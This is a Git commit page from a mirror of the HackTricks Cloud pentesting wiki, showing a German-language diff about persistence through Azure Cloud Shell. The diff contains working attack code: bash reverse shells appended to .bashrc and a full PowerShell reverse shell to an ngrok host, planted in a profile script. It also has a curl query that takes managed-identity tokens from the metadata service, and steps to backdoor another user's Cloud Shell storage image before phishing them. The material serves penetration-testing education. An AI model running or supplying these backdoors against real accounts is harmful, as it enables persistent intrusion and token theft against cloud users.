gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-28 21:53:15 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/azure-security/az-persistence/az-cloud

Browse Source
This commit is contained in:
Translator
2025-05-12 19:25:30 +00:00
parent e6d60a4352
commit 8cac93fbc6
1 changed files with 40 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files

43
src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md
View File

@@ -7,16 +7,53 @@
Azure Cloud Shell bietet Befehlszeilenzugriff zur Verwaltung von Azure-Ressourcen mit persistentem Speicher und automatischer Authentifizierung. Angreifer können dies ausnutzen, indem sie Hintertüren im persistenten Home-Verzeichnis platzieren:
* **Persistenter Speicher**: Das Home-Verzeichnis von Azure Cloud Shell ist auf einem Azure-Dateifreigabe gemountet und bleibt auch nach dem Ende der Sitzung intakt.
* **Startskripte**: Dateien wie .bashrc werden automatisch zu Beginn jeder Sitzung ausgeführt, was eine persistente Ausführung beim Start der Cloud Shell ermöglicht.
* **Startskripte**: Dateien wie `.bashrc` oder `config/PowerShell/Microsoft.PowerShell_profile.ps1` werden automatisch zu Beginn jeder Sitzung ausgeführt, was eine persistente Ausführung beim Start der Cloud Shell ermöglicht.
Beispiel-Hintertür in .bashrc:
```bash
echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/$CCSERVER/443 0>&1 &)' >> $HOME/.bashrc
echo '(nohup /usr/bin/env /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/$CCSERVER/443 0>&1 &)' >> $HOME/.bashrc
```
Diese Hintertür kann Befehle sogar 5 Minuten nach dem Abschluss der Cloud-Shell durch den Benutzer ausführen.
Zusätzlich wird der Azure-Metadatendienst nach Instanzdetails und Tokens abgefragt:
Zusätzlich die Metadaten-Dienste von Azure nach Instanzdetails und Tokens abfragen:
```bash
curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -s
```
### Cloud Shell Phishing
Wenn ein Angreifer Bilder anderer Benutzer in einem Storage Account findet, auf den er Schreib- und Lesezugriff hat, kann er das Bild herunterladen, **eine Bash- und PS-Hintertür hinzufügen** und es zurück in den Storage Account hochladen, sodass beim nächsten Zugriff des Benutzers auf die Shell die **Befehle automatisch ausgeführt werden**.
- **Bild herunterladen, Hintertür hinzufügen und hochladen:**
```bash
# Download image
mkdir /tmp/phishing_img
az storage file download-batch -d /tmp/phishing_img --account-name <acc-name> -s <file-share>
# Mount the image
mkdir /tmp/backdoor_img
sudo mount ./.cloudconsole/acc_carlos.img /tmp/backdoor_img
cd /tmp/backdoor_img
# Create backdoor
mkdir .config
mkdir .config/PowerShell
touch .config/PowerShell/Microsoft.PowerShell_profile.ps1
chmod 777 .config/PowerShell/Microsoft.PowerShell_profile.ps1
# Bash backdoor
echo '(nohup /usr/bin/env /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/${SERVER}/${PORT} 0>&1 &)' >> .bashrc
# PS backdoor
echo '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19838);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' >> .config/PowerShell/Microsoft.PowerShell_profile.ps1
# Unmount
cd /tmp
sudo umount /tmp/backdoor_img
# Upload image
az storage file upload --account-name <acc-name> --path ".cloudconsole/acc_username.img" --source "./tmp/phishing_img/.cloudconsole/acc_username.img" -s <file-share>
```
- **Dann, phish den Benutzer, um auf https://shell.azure.com/**
{{#include ../../../banners/hacktricks-training.md}}